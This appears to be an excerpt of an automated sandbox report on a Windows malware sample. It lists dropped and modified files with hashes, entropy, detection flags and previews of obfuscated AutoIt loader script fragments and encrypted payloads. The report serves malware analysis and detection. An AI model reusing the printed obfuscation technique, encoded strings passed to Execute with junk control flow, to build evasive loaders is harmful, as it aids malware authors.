                                                                              SHA-512:7384CF38339A58BC9C077DE3394F34C6A286B47D9A59B48BD1171B2964835281AECECDF0AC10193415D0D963BAF46C1064ED47312CE658B6F0B22D94E6FD1FC4
                                                                              Malicious:false
                                                                              Preview:.(.._QCF.k............A....:!8.'.......rj.#OQ7n.o#.'...^...f..$.R.....E0.Y5.c..!. K.....=.....B....x3..h..u,...0...W....... .uS8...n.,....s`...|.M.`RX~....4....MZg9...K...I.]...%L.j.R.Ax"..........*{p.....DQ..G9...1.2pw.. .Y![.?u.O]..).... ...po.a..SD...X.rP....p;..+.."`z....,[.?y....bFYN+.a.......E..>.'s....S.9..P........,....l..z5W.f.I..es&+....A`.....J.3........lq8ae.c.d.Y,.}<.QEgu=..c...c..6.Ho.....P..f.Cu....%V....ik.I...". 9...fo.g.v...}./h.."...O.o........tF:..`..K...C....C..,.eb..b.P4..!..,..&...p..........l.Q..3._..D.......le>.L!.[k.*.\..8.3.:.1./.Z......N...0...Jw............ ntu....!...~=..O..).$>3k...g.GI|MT.`n<..>..)d....4.sbD[.u9.c...y..H..G.lt|-..v.|...U......iH.n.WM3.....'..f.R...=Qx.A./...3...>.$4..rh..b..'|(....&.....$...F.... i...~:..K..8D.qj<Bx.X..T.)...gK.k.;i..sh.....|h-+,.{..0-....?..ic.K.R....>....V.0...K....w.V@..F..d?.$Z.,..*.T..{`....)X.)O.i....^..g.....m....L.+....=.V......"...h...Q.J...F1..3..]..aD..1.
                                                                              Process:C:\Users\user\Desktop\8lOT1rXZp5.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):90112
                                                                              Entropy (8bit):7.997878624577866
                                                                              Encrypted:true
                                                                              SSDEEP:1536:LjvQnuo3ODQPp4myNoEsIgrpOp5eA5zLVYfrwBNA+1DyevWxx93clTaREbis4AJJ:v4uoFR4myNoJIII5eMzLK7UDdOt3clmM
                                                                              MD5:E4F38ADA217F47C7ACF0B1A0C7D86C59
                                                                              SHA1:C8BC4DB75803E0464DE7ABF074AF05B7538957CA
                                                                              SHA-256:EE6A09A3252B0B091B9974BF2809AC6150799A62F3656482B324348A9EB0CB05
                                                                              SHA-512:0CC645F178528121F8F05BCDDEDFEF9AB3B23F018F100DE1096DCC63816C2684F70DE24D0B1A60AF4D944CC4B39402A3532815D99760776F9FFA5C71A84A5430
                                                                              Malicious:false
                                                                              Preview:.L:...qG....6[W.....Sr..0.[W..j....;.zVx?...-.....upj1.^.X.5.%...w..Z.r.V..g...i.B.l.I..$.....]..c...9;....L...!s..V.XKk.1.lo.R=..,......$............5;..K.C.t.x.u...jg....F...7..)..D.p...\=.2...+d..s.$.....v.O...7^we..1....CE.5.U5.!._,E..*.7...'|].t.39../q.Zgl.h.{..... .\.l.'......=...\.kt.s(c.,E..4..*.j.".m..a.....-.r.T..F.x.`-.j...[M........ty......x.....o...,..(sR...jMm." .J7..:.....x..+.u.A.-oJFbx._.N.....v.t...A...e.UQu.*..K...`..{..%z..0u.l..k..>|.K..2....i.....w......Q*!..".-J+.:..Y...X...9...|...E.........N.H........5...#.D$r.}...}o=.+..q.D|%....b$.h.B..A..%..,n@....A1...n..oQ.y..m..l.[.ag..'.c0...Ex....1k..`...F.v..&..) ..+<?..........4...HU....RWM@R.Lt.|.......m.e..E3....@] O.n..2.e^..E.C5.........w.l)G./=ZL...EZ...X..Y.Y...R.K..px.%...0..L..tK).....F..&..X.t..9Il.p>w.<....G..g...%..\..W..9I......;.=.PS....q.-.o..."B..O......U.. ...d....?...q2S.p...e`,..s.k..jH`i p..pe.p...]H.Z.....Q.G..F.k.8.......$.r......*"4x........\.
                                                                              Process:C:\Users\user\Desktop\8lOT1rXZp5.exe
                                                                              File Type:ASCII text, with very long lines (353), with CRLF, CR, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1028386
                                                                              Entropy (8bit):5.83926377750451
                                                                              Encrypted:false
                                                                              SSDEEP:24576:Dltd7G6p3tziDzIysocUbYdMigj9Hv92c:JfT9zinIwbkc
                                                                              MD5:D353F3670FCC64603B64C0A6CCA90928
                                                                              SHA1:1D354A3469A77AA085EB2A71463F86A5E3A28AB6
                                                                              SHA-256:017BF1D9BA8D0D162BC99FD78D5C8A84DA0221B1A4864F177CCA26AEF3AB3C42
                                                                              SHA-512:25CB7776906BF4B885CE5FB794397367AC23157DB460B3747F320C3AF7D6C9DCA3C1814B5D7B3C863726867A748D01ECCCD0CD64C2FEC0BB1B81886D0078C087
                                                                              Malicious:false
                                                                              Preview:$xZikekkLZ = OOAetW("90@89@79@82@116@75@126@84@120@77@123@123@84@86@114@85@96@131@123@120@80@83@127@117@106@119",9)..#NoTrayIcon....Func dOhOLGl($pbUyU,$DPiEvjjJc,$iIqeZxCq,$HAkvHtGEr)..Local $oNThbFvJOtySrDYlNlesywEzazmmQHoeoNZVuPCOudyDczztuvRSDURuo = 'UruWTiVeJfDrrXIgkOWqYZqczzPdmhVTMHVnIpbXIaJrAeaUlfJrloAVrKCmsECvzKdvepFwsYaGfWUdwUylESIDiZxYHXGrPhKQLWSqJIMjQTFiPknbnaRBwNgePHxzagQejrFyeyAWuvNhxhocmoEvcoPYHPkwhaTBrDULGzxzRVxEZwIBmZTpJzGrgGbhUmIND'..Local $lRavOuOkFmOlZGiJ = OOAetW("83@113@115@109@79@121@111@80@106@103@115@72@82@122@108@89@123@103@84@123@67@86@67@90@79",1)..Local $HMjjipjPfAnrLfx = 'OBzztwgcTsoxfWHtvDNMBViUxwQLnfEDYGuZFxyGbRaPqRmzSxHoCIaTxmZrkCWDNFcIQHmebigKCsUCBvStIvwdgjFuxecUUOexvQClUEKxxIseEvBOKSVsEyxEezHxMzPNfmuLUHptLGVGUCBYBHleTKQdvYoBWfIwSDMyfQTeJQGXpNJmSJTyoNUEIQgVmHicYUNsPcJKNoaetSiIfIJhcCStJovmBYCwIlZgZaJvZpaqxRAQJFFQYUZceJHHYloOFszUTSIXZhhjlSKSIG'...$mBgpYYvkhGHs = 100..$FcxcjXWIt = 51..While ((6195-6194)*5738)..Switch $mBgpYYvkhGHs..Case 92....$TLgjEJAYPGkDC
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:ASCII text, with very long lines (353), with CRLF, CR, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1028386
                                                                              Entropy (8bit):5.83926377750451
                                                                              Encrypted:false
                                                                              SSDEEP:24576:Dltd7G6p3tziDzIysocUbYdMigj9Hv92c:JfT9zinIwbkc
                                                                              MD5:D353F3670FCC64603B64C0A6CCA90928
                                                                              SHA1:1D354A3469A77AA085EB2A71463F86A5E3A28AB6
                                                                              SHA-256:017BF1D9BA8D0D162BC99FD78D5C8A84DA0221B1A4864F177CCA26AEF3AB3C42
                                                                              SHA-512:25CB7776906BF4B885CE5FB794397367AC23157DB460B3747F320C3AF7D6C9DCA3C1814B5D7B3C863726867A748D01ECCCD0CD64C2FEC0BB1B81886D0078C087
                                                                              Malicious:false
                                                                              Preview:$xZikekkLZ = OOAetW("90@89@79@82@116@75@126@84@120@77@123@123@84@86@114@85@96@131@123@120@80@83@127@117@106@119",9)..#NoTrayIcon....Func dOhOLGl($pbUyU,$DPiEvjjJc,$iIqeZxCq,$HAkvHtGEr)..Local $oNThbFvJOtySrDYlNlesywEzazmmQHoeoNZVuPCOudyDczztuvRSDURuo = 'UruWTiVeJfDrrXIgkOWqYZqczzPdmhVTMHVnIpbXIaJrAeaUlfJrloAVrKCmsECvzKdvepFwsYaGfWUdwUylESIDiZxYHXGrPhKQLWSqJIMjQTFiPknbnaRBwNgePHxzagQejrFyeyAWuvNhxhocmoEvcoPYHPkwhaTBrDULGzxzRVxEZwIBmZTpJzGrgGbhUmIND'..Local $lRavOuOkFmOlZGiJ = OOAetW("83@113@115@109@79@121@111@80@106@103@115@72@82@122@108@89@123@103@84@123@67@86@67@90@79",1)..Local $HMjjipjPfAnrLfx = 'OBzztwgcTsoxfWHtvDNMBViUxwQLnfEDYGuZFxyGbRaPqRmzSxHoCIaTxmZrkCWDNFcIQHmebigKCsUCBvStIvwdgjFuxecUUOexvQClUEKxxIseEvBOKSVsEyxEezHxMzPNfmuLUHptLGVGUCBYBHleTKQdvYoBWfIwSDMyfQTeJQGXpNJmSJTyoNUEIQgVmHicYUNsPcJKNoaetSiIfIJhcCStJovmBYCwIlZgZaJvZpaqxRAQJFFQYUZceJHHYloOFszUTSIXZhhjlSKSIG'...$mBgpYYvkhGHs = 100..$FcxcjXWIt = 51..While ((6195-6194)*5738)..Switch $mBgpYYvkhGHs..Case 92....$TLgjEJAYPGkDC
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):943784
                                                                              Entropy (8bit):6.625461630496363
                                                                              Encrypted:false
                                                                              SSDEEP:24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
                                                                              MD5:78BA0653A340BAC5FF152B21A83626CC
                                                                              SHA1:B12DA9CB5D024555405040E65AD89D16AE749502
                                                                              SHA-256:05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
                                                                              SHA-512:EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                              Joe Sandbox View:
                                                                              • Filename: 99awhy8l.exe, Detection: malicious, Browse
                                                                              • Filename: eRApzqPkL1.exe, Detection: malicious, Browse
                                                                              • Filename: eRApzqPkL1.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: pennicle.txt.ps1, Detection: malicious, Browse
                                                                              • Filename: SolPen.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\8lOT1rXZp5.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1938944
                                                                              Entropy (8bit):7.999907237328059
                                                                              Encrypted:true
                                                                              SSDEEP:49152:/D1DYPeFt33s7BJjz1CutDFF8Jv6o35bzPkTGD:LieFZ3aBGu9FC8o3Bd
                                                                              MD5:320E70E313B3D2E1FBCCB281EE8B30BC
                                                                              SHA1:FAB977083428CF69106EAE435D08BCFB35899DA1
                                                                              SHA-256:37D7BEB2569830B9E05F0A7DAC9B575D458AFAA726DED46F48D238CEFAE444B2
                                                                              SHA-512:CB736A790FCB7AE09A43F8A33E316FDC96CA1F8B0A508D8E2F4CEEB72429961E13FDC155D8900714EFBD5995E43A0887AC873DA0F84D03CBB128311750E550DA
                                                                              Malicious:false
                                                                              Preview:.l.][...pR...1u.rQK.z.g..A...zlC}.q.9......?&..r..g.6.xn.*v.Kb...eT1....."...q....t.J.KNE\......jcY.~...S.M$.7.x..k.7..J....W...K&......G.Y..n.bp..x$.6..@QL..h..v}?...@.d}.>U.#^..$.a..R..'...p0.-...!O.A.6...&*...6v%B....#.....?..,Zdv$66O5....H...........~t.....uB..T..V).n~.....(.z*c,V.;}s.......WU.^.,+......@F..*.._[..|.......{.U..kv...//.)e..d.d'...@.5<8.Fr...e*o...)......l..v.j<.XZ;(.<......~.f...&U...|....Q.....6]...$..o.Hl.ab....F. j.P..a.Y....]6.....,E....T....B.f..{o.....`Om.~.T...V....;.6...hE)...tN..%.h..de]......_...#...C7sz.5.g....b&..Y.S.Y[..c....gV....~.v M..i.?X.U[q.{.c.$..R7& V.e..........I4.M|.]..\..@.x.....ze...L..o..2..EN.G.4*p.Z......c.9.,P.=.O[Z.Z>Wx......:?../u..Fm..U...M...yp|El+n.Z;r.Y...kh.2v...i.....g..zj....5....%.~............G&.d.v.`j.....i..7....E......z..C.........]..z..I.tE.M,.s../..l..h...'..kb..........mIs[..v1v...#W....Ad....J*.R&.=..bt...^.ni.'9^.....m....<}..._..D...?....=......1
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:ASCII text, with very long lines (352), with CRLF, CR, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1043006
                                                                              Entropy (8bit):5.855292086933286
                                                                              Encrypted:false
                                                                              SSDEEP:6144:lsumrpbef89hPHsjG+XGma+yiEn5sgz7GP/PDkLyHiB+0RhqTGlTJIWIjly2brL4:3z0bPHHFmabiEn58P6yCBlelyaC0W7
                                                                              MD5:EBA2DA2CCB2A92B10E917608F89F8758
                                                                              SHA1:232C57CD8BAA2A2017C87274460F3A0B94E1EA33
                                                                              SHA-256:D70EFDCFF9ECE6DBA302999CF7121CEBB2625A0A8630977ADFFA0AFDB5AF589F
                                                                              SHA-512:AEDEA7FA624A3E05C554EA41C70D7374E8DF0532293768101E9B3FF23AA17F0D386246A90F0063222D225A00B2DF74A312C97CDC5DF3B19912AA07042F515AE7
                                                                              Malicious:true
                                                                              Preview:$cXEBDC = OPtVKuztlSKJN("98#68#98#70#108#119#70#75#116#97#74#122#73#73#107#66#105#106#84#118",0)..#NoTrayIcon....Func rsxEGWkKMOncmt($XPKf,$MjonO,$KnUcQrN,$KdjRhhrO,$wYQp,$MeGga,$dyjyR,$AkSzH)..Local $QGDSenpYiiAYvbMROCLnb = 'tuZWNRVLzGtTbymOjTysXtFTTrmqEyGhSkCbTyLarvOTTCZHsqdRayGZAyrJaUihqRqkDeUuiNgBdMqdrSJDPOUMECWNewZofBTwBOrfupJFRyJNtMGmkDbkXgGqyutuNujPTZPfOxbGyfVmToIdcmWLrIrhiepZtDRKSUUyWsLRyRuHaiiXbOKgpBLlVBoLlnCBnlHYgDztOyFjCvUZVjBfSD'..Local $soKlcoZGHfEpomoJUcGmtVmImGoQYWjIV = OPtVKuztlSKJN("117#121#102#76#122#78#82#116#115#75#78",3)..Local $WgmpayB = 'LLGXCKhUItcdscRjUiCIoUFQjUwXhfzbtvBaQnusbUatjxLAvjflDTgQyPKHIfHaKXkUUmvvwllgCAESoBAwqoUkoLjqNnIihZzgpQFXPTpaIqhFkSniOGaCeZMphvICCeqDufIaVDkuZCCinHPVZAzHHRkptvKzkGPGZKnVpukkxkCAbEKFGNCwJzVgtmh'...$XiwMJ = 148..$vqYJDYaIQRePb = 74..While ((5800-5799)*5351)..Switch $XiwMJ..Case 143....$biOwerEHqrHZO = Execute(OPtVKuztlSKJN("79#94#117#107#47#127#126#81#120#120#112#124#127#96#123#97#87#115#48",7))..$142 = 113..For $XjXOGOJMMZjeGbgXwXv
                                                                              Process:C:\Users\user\Desktop\8lOT1rXZp5.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):943924
                                                                              Entropy (8bit):6.625735643545649
                                                                              Encrypted:false
                                                                              SSDEEP:24576:ZJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:ZC7hGOSPT/PxebaiO
                                                                              MD5:58B5BF5A115DE982ECF7842C982D6DBD
                                                                              SHA1:C85D93BAC730B5E3B4B521CE49F79737890AB878
                                                                              SHA-256:2DD1BDEA2C23FEC46072A83756FFB2930319B9127536D3177B01444936383992
                                                                              SHA-512:18927F97537A1B33CA0E2D1C6C4F70A38D5E14FFF4E193F66B3B81A2BF9E5163370695762E11653B2765ACDC70D80CCA582D985114EF6E5657D199311CBDD757
                                                                              Malicious:false
                                                                              Preview:PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs........................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B....................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):65440
                                                                              Entropy (8bit):6.049806962480652
                                                                              Encrypted:false
                                                                              SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                              MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                              SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                              SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                              SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: c2.hta, Detection: malicious, Browse
                                                                              • Filename: c2.hta, Detection: malicious, Browse
                                                                              • Filename: OR8Ti8rf8h.exe, Detection: malicious, Browse
                                                                              • Filename: RFQ-004282A.Teknolojileri A.S.exe, Detection: malicious, Browse
                                                                              • Filename: c2.hta, Detection: malicious, Browse
                                                                              • Filename: c2.hta, Detection: malicious, Browse
                                                                              • Filename: PQwHxAiBGt.exe, Detection: malicious, Browse
                                                                              • Filename: P0J8k3LhVV.exe, Detection: malicious, Browse
                                                                              • Filename: NIENrB5r6b.exe, Detection: malicious, Browse
                                                                              • Filename: DM6vAAgoCw.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):943784
                                                                              Entropy (8bit):6.625461630496363
                                                                              Encrypted:false
                                                                              SSDEEP:24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
                                                                              MD5:78BA0653A340BAC5FF152B21A83626CC
                                                                              SHA1:B12DA9CB5D024555405040E65AD89D16AE749502
                                                                              SHA-256:05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
                                                                              SHA-512:EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\8lOT1rXZp5.exe
                                                                              File Type:ASCII text, with very long lines (352), with CRLF, CR, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1043006
                                                                              Entropy (8bit):5.855292086933286
                                                                              Encrypted:false
                                                                              SSDEEP:6144:lsumrpbef89hPHsjG+XGma+yiEn5sgz7GP/PDkLyHiB+0RhqTGlTJIWIjly2brL4:3z0bPHHFmabiEn58P6yCBlelyaC0W7
                                                                              MD5:EBA2DA2CCB2A92B10E917608F89F8758
                                                                              SHA1:232C57CD8BAA2A2017C87274460F3A0B94E1EA33
                                                                              SHA-256:D70EFDCFF9ECE6DBA302999CF7121CEBB2625A0A8630977ADFFA0AFDB5AF589F
                                                                              SHA-512:AEDEA7FA624A3E05C554EA41C70D7374E8DF0532293768101E9B3FF23AA17F0D386246A90F0063222D225A00B2DF74A312C97CDC5DF3B19912AA07042F515AE7
                                                                              Malicious:false
                                                                              Preview:$cXEBDC = OPtVKuztlSKJN("98#68#98#70#108#119#70#75#116#97#74#122#73#73#107#66#105#106#84#118",0)..#NoTrayIcon....Func rsxEGWkKMOncmt($XPKf,$MjonO,$KnUcQrN,$KdjRhhrO,$wYQp,$MeGga,$dyjyR,$AkSzH)..Local $QGDSenpYiiAYvbMROCLnb = 'tuZWNRVLzGtTbymOjTysXtFTTrmqEyGhSkCbTyLarvOTTCZHsqdRayGZAyrJaUihqRqkDeUuiNgBdMqdrSJDPOUMECWNewZofBTwBOrfupJFRyJNtMGmkDbkXgGqyutuNujPTZPfOxbGyfVmToIdcmWLrIrhiepZtDRKSUUyWsLRyRuHaiiXbOKgpBLlVBoLlnCBnlHYgDztOyFjCvUZVjBfSD'..Local $soKlcoZGHfEpomoJUcGmtVmImGoQYWjIV = OPtVKuztlSKJN("117#121#102#76#122#78#82#116#115#75#78",3)..Local $WgmpayB = 'LLGXCKhUItcdscRjUiCIoUFQjUwXhfzbtvBaQnusbUatjxLAvjflDTgQyPKHIfHaKXkUUmvvwllgCAESoBAwqoUkoLjqNnIihZzgpQFXPTpaIqhFkSniOGaCeZMphvICCeqDufIaVDkuZCCinHPVZAzHHRkptvKzkGPGZKnVpukkxkCAbEKFGNCwJzVgtmh'...$XiwMJ = 148..$vqYJDYaIQRePb = 74..While ((5800-5799)*5351)..Switch $XiwMJ..Case 143....$biOwerEHqrHZO = Execute(OPtVKuztlSKJN("79#94#117#107#47#127#126#81#120#120#112#124#127#96#123#97#87#115#48",7))..$142 = 113..For $XjXOGOJMMZjeGbgXwXv
                                                                              Process:C:\Users\user\Desktop\8lOT1rXZp5.exe
                                                                              File Type:ASCII text, with very long lines (342), with CRLF, CR, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):945527
                                                                              Entropy (8bit):5.837096519903794
                                                                              Encrypted:false
                                                                              SSDEEP:12288:afFu0JpU7C3YoR3udfbpKCrUDXdgl8OXeJlpZIYahylC:v2UIV3ucKAgmOQZlrC
                                                                              MD5:E24236C89CE12EEEB9CFA655716D2994
                                                                              SHA1:6B5869C4A43DE9C394284B5657C6709063B530BF
                                                                              SHA-256:DE29E32CE6E527B952ADF8D584648C5B5A6805645589E4AC9287BD5481EB5306
                                                                              SHA-512:03A58FBF1E6D7433A4493B567F6E8FF0A740721B50D8CA5776DCD14218A9C0EF84877391973CC3F6702B415C3EA4E549C9F9A88859E0B30F83A3DD4CE8AEAFD6
                                                                              Malicious:false
                                                                              Preview:$cOHflXfqXCmsQs = urjDlX("112<93<122<119<111<71<85<94<73<103<85<121<105<94",4)..#NoTrayIcon....Func WaVZwPQN($TTa,$tufNyIPbz,$vwTrxnD)..Local $xTllHtYNjHPKQAJdsmxqgnY = 'DZVNzHdsrIElVtuqJwkMLMlzzritigrVVQHHokxEsbHoVmxhzzsjhjIRPCzfAklOFJfybnSbHGxgtebUJTKNXQHJiPRFRttyjSCjpfPUATFGRxMNymGGBvRPwFXHHhGCCgejmkKzrPhrlqRNrrAsnbEPqNlEaojhjetDsmgTOjCLpNEqNp'...$frGNgXBqQ = 137..$eVqoQDZ = 79..While ((8286-8285)*8154)..Switch $frGNgXBqQ..Case 129....$SmAzYrPOuGXOXqPa = Execute(urjDlX("88<121<119<110<115<108<78<120<75<113<116<102<121<45<44<124<89<125<70<87<117<119<90<90<85<44<46",5)), $cwhslxOHQ = 'reAagnkMsahLFwhI'..$69 = 148..For $UeMiIhkaZqILMqxCAywAvqdnhOxleGYPsjolmGljgwYeuexFD = 15 To 27..Local $DqYFmSnWJnyzm = 'XQUoDLRoDbYJvkrCAqjHFrtUTcZgeShTjxrbOLlJdcbBGPv'..Local $SmAzYrPOuGXOXqPa = Execute(urjDlX("75<90<113<103<43<57<60<44",3))..Next....$frGNgXBqQ = $frGNgXBqQ + 1..Case 130....$YtuRFUMZfiLDy = urjDlX("85<79<76<93<91<115<85<85<78<81<113<74<84<92",8)..$159 = 59..For $ptbeoGNOPDslFCgrZMcVUoN
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):943784
                                                                              Entropy (8bit):6.625461630496363
                                                                              Encrypted:false
                                                                              SSDEEP:24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
                                                                              MD5:78BA0653A340BAC5FF152B21A83626CC
                                                                              SHA1:B12DA9CB5D024555405040E65AD89D16AE749502
                                                                              SHA-256:05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
                                                                              SHA-512:EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:ASCII text, with very long lines (342), with CRLF, CR, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):945527
                                                                              Entropy (8bit):5.837096519903794
                                                                              Encrypted:false
                                                                              SSDEEP:12288:afFu0JpU7C3YoR3udfbpKCrUDXdgl8OXeJlpZIYahylC:v2UIV3ucKAgmOQZlrC
                                                                              MD5:E24236C89CE12EEEB9CFA655716D2994
                                                                              SHA1:6B5869C4A43DE9C394284B5657C6709063B530BF
                                                                              SHA-256:DE29E32CE6E527B952ADF8D584648C5B5A6805645589E4AC9287BD5481EB5306
                                                                              SHA-512:03A58FBF1E6D7433A4493B567F6E8FF0A740721B50D8CA5776DCD14218A9C0EF84877391973CC3F6702B415C3EA4E549C9F9A88859E0B30F83A3DD4CE8AEAFD6
                                                                              Malicious:false
                                                                              Preview:$cOHflXfqXCmsQs = urjDlX("112<93<122<119<111<71<85<94<73<103<85<121<105<94",4)..#NoTrayIcon....Func WaVZwPQN($TTa,$tufNyIPbz,$vwTrxnD)..Local $xTllHtYNjHPKQAJdsmxqgnY = 'DZVNzHdsrIElVtuqJwkMLMlzzritigrVVQHHokxEsbHoVmxhzzsjhjIRPCzfAklOFJfybnSbHGxgtebUJTKNXQHJiPRFRttyjSCjpfPUATFGRxMNymGGBvRPwFXHHhGCCgejmkKzrPhrlqRNrrAsnbEPqNlEaojhjetDsmgTOjCLpNEqNp'...$frGNgXBqQ = 137..$eVqoQDZ = 79..While ((8286-8285)*8154)..Switch $frGNgXBqQ..Case 129....$SmAzYrPOuGXOXqPa = Execute(urjDlX("88<121<119<110<115<108<78<120<75<113<116<102<121<45<44<124<89<125<70<87<117<119<90<90<85<44<46",5)), $cwhslxOHQ = 'reAagnkMsahLFwhI'..$69 = 148..For $UeMiIhkaZqILMqxCAywAvqdnhOxleGYPsjolmGljgwYeuexFD = 15 To 27..Local $DqYFmSnWJnyzm = 'XQUoDLRoDbYJvkrCAqjHFrtUTcZgeShTjxrbOLlJdcbBGPv'..Local $SmAzYrPOuGXOXqPa = Execute(urjDlX("75<90<113<103<43<57<60<44",3))..Next....$frGNgXBqQ = $frGNgXBqQ + 1..Case 130....$YtuRFUMZfiLDy = urjDlX("85<79<76<93<91<115<85<85<78<81<113<74<84<92",8)..$159 = 59..For $ptbeoGNOPDslFCgrZMcVUoN
                                                                              Process:C:\Windows\System32\cmd.exe
